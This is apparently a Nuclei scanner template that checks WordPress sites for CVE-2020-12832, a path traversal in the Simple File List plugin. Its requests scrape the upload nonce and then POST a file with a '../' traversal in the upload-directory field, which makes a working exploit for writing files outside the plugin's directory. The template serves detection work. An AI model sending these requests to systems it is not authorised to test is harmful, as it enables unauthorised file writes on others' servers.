Simple File List plugin allows path traversal via file upload, enabling files to be written outside the upload directory.
id: CVE-2020-12832
info:
name: WordPress Simple File List - Path Traversal
author: riteshs4hu
severity: critical
description: |
Simple File List plugin allows path traversal via file upload, enabling files to be written outside the upload directory.
impact: |
Attackers can delete arbitrary files on the server, potentially causing data loss or service disruption.
remediation: |
Update to version 4.2.8 or later.
reference:
- https://wpscan.com/vulnerability/422360b9-4c70-4fd9-9833-375f1294bd7a/
- http://nvd.nist.gov/vuln/detail/CVE-2020-12832
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-12832
epss-score: 0.73235
epss-percentile: 0.9874
cwe-id: CWE-22
cpe: cpe:2.3:a:simplefilelist:simple-file-list::::::wordpress::*
metadata:
verified: true
max-request: 3
vendor: Simple File List
product: Simple File List WordPress Plugin
tags: cve,cve2020,wp,wordpress,wp-plugin,traversal,simple-file-list,lfi,vkev
variables:
rand: "{{rand_base(7)}}"
http:
- raw:
- |
GET /?rest_route=/wp/v2/pages&per_page=100 HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: slug
json:
- '.[] | select(.content.rendered | contains("eeSFL_UploadGo")) | .slug'
internal: true
- raw:
- |
GET {{slug}}/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: sflnonce
group: 1
regex:
- 'name="ee-simple-file-list-upload-nonce"[^>]*?value="([A-Za-z0-9]+)"'
internal: true
- type: regex
name: sflid
group: 1
regex:
- 'id="eeSFL_ID">([0-9]+)'
internal: true
- type: regex
name: ext
group: 1
regex:
- 'eeSFL_FileFormats\s*=\s*"([A-Za-z0-9]+)'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytA7kTuCe4IHDaUBZ
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="action"
sfl_upload_job
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="file"; filename="{{rand}}.{{ext}}"
Content-Type: application/octet-stream
{{rand}}
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="eeSFL_ID"
{{sflid}}
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="eeSFL_FileUploadDir"
wp-content%2Fuploads%2Fsimple-file-list%2F..%2F
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="ee-simple-file-list-upload"
{{sflnonce}}
------WebKitFormBoundarytA7kTuCe4IHDaUBZ--
- raw:
- |
GET /wp-content/uploads/{{rand}}.{{ext}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "{{rand}}")'
condition: and
# digest: 4a0a0047304502202dfd8d78501f770a9603f0ef6373236de5865783c3090c6bbf8c5010523d881f0221009e9ae1dfb09035b715ea286d7033092c16b8a42c4aa4a3c5af46f2ae19b35eab:922c64590222798bb761d5b6d8e72950